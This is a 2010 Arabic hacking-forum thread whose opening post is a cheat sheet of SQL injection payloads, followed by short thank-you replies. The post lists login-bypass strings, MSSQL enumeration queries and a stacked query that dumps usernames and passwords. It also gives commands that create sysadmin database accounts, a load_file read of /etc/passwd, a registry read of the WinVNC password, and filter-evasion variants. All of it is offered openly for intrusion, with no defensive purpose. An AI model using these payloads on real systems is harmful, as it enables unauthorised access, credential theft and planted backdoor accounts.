نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

 
العودة   منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team | > ::. ســــاحة الــــهاكــــر الـعـام .:: > [ منتدى حـقن قواعد البيانات | Sql injcetion ]
 

[ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك ,

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 20/05/2010, 15:17   المشاركة رقم: 1
المعلومات
الكاتب:
 Mouna128  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية Mouna128

البيانات
التسجيل : May 2010
العضوية : 94
الاهتمامات :
الإقامة : الجزائر
المواضيع : 59
الردود : 185
المجموع : 244
بمعدل : 0.04 يوميا
الاختراقات : []
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 29/11/2011/14:00
سبب الغياب :
معدل التقييم: 16
نقاط التقييم: 10
Mouna128 is on a distinguished road
شكراً: 1
تم شكره 5 مرة في 3 مشاركة

 Algeria


الإتصالات
الحالة:
Mouna128 غير متواجد حالياً
وسائل الإتصال:

افتراضي تحديث الصفحة بعض الاوامر اللي تساعد في تخطي واستغلال ثغرات الحقن


السلام عليكم ورحمه الله وبركاته
كيف الحال اعضاء منتدانا الغالي
حبيت انزل بعض الاوامر اللي تساعد في تخطي واستغلال ثغرات الحقن
نبداء :


1- حركات اساسية تستخدم لتسجيل الدخول بدون يوزر وباس :


Login:' or 1=1--
- Pass:' or 1=1--
- []' or 1=1--
########################

2- حركات اخرى معروووفة للجميع تستخدم في قواعد MsSQL:


- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
########################

3- تجميع المعلومات :


- ' or 1 in (select @@version)--
- ' union all select @@version--
########################

4- انواع قواعد البيانات واهم القواعد الاساسية الملحقة بها :

-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
########################


5- سحب كلمات السر :

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
########################


6- انشاء حسابات مستخدمين على القواعد المختلفة :
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CRATE USER name IDENTIFIED BY '123456'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD '123456'
Oracle
CRATE USER name IDENTIFIED BY 123456
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
########################


7- استدعاء ملف من السيرفر :


- ' union select 1,load_file('/etc/passwd'),1,1,1;
########################

8- معرفة اسم السيرفر والكونفج :

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
########################
9- الحصول على اسم المستخدم والباسورد للـفي ان اس :


- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
########################

10- التحايل على صناديق ادخال اسم المستخدم وكلمات السر :


- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
########################

11- النقطة السابقة نفسها لكن باستخدام الفواصل والشرطات نستخدم /**/ لتخطي الفلتره على علامة + او المسافة :


-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
###########

وشكرآ ...في انتظار ردودكم



آخر مواضيع » Mouna128

توقيع : Mouna128

عرض البوم صور Mouna128   رد مع اقتباس
قديم 29/07/2010, 17:37   المشاركة رقم: 2
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

لاهنت اخي الغالي
تحيتي لك

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 30/07/2010, 20:46   المشاركة رقم: 3
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

مشكورة اختي
بارك الله بيك

عرض البوم صور WOLF_DZ   رد مع اقتباس
قديم 29/05/2011, 17:26   المشاركة رقم: 4
المعلومات
الكاتب:
 zerocool  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
zerocool غير متواجد حالياً
وسائل الإتصال:

تسلم ايدك مشكووووووووور

عرض البوم صور zerocool   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 35
abdou17 , acer-dz , ANDERSON , arbi , Black Demon Dz , البرنس هاشم , الشبح المرح , Dr-Genix , dzkabyle , Dz_V!rUs , ExPLo!T_Dz , fire-dz , fleurshi , hichem05 , HMODH , Ic3.BoY , Imad.Dz , lasbat-dz , lennix , MdMn HaCk3r , moja4ed_fz , Mouna128 , n2nhacker , o0o , questral , RAGE SCREAM , S1LV3rS3rf3r , TaYLoR.Dz , Th3 K!LL3r Dz , ThE JoCkEy , toxine , WOLF_DZ , xdvb , X_AviaTique_X , zerocool

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تحديث الصفحة دورة كاملة لكشف التلغيم (مؤقت) انور العراقي [ مـنتدى حمايه الـبريد الالكتروني | Hacking E-mails ] 4 21/11/2014 13:20
تحديث الصفحة برنامج File Gen لسرقة الايميلات ((شرح بالصور)) والتبليغ مضمون 100%100 انور العراقي [ مـنتدى حمايه الـبريد الالكتروني | Hacking E-mails ] 6 28/08/2010 12:47

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 17:55.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115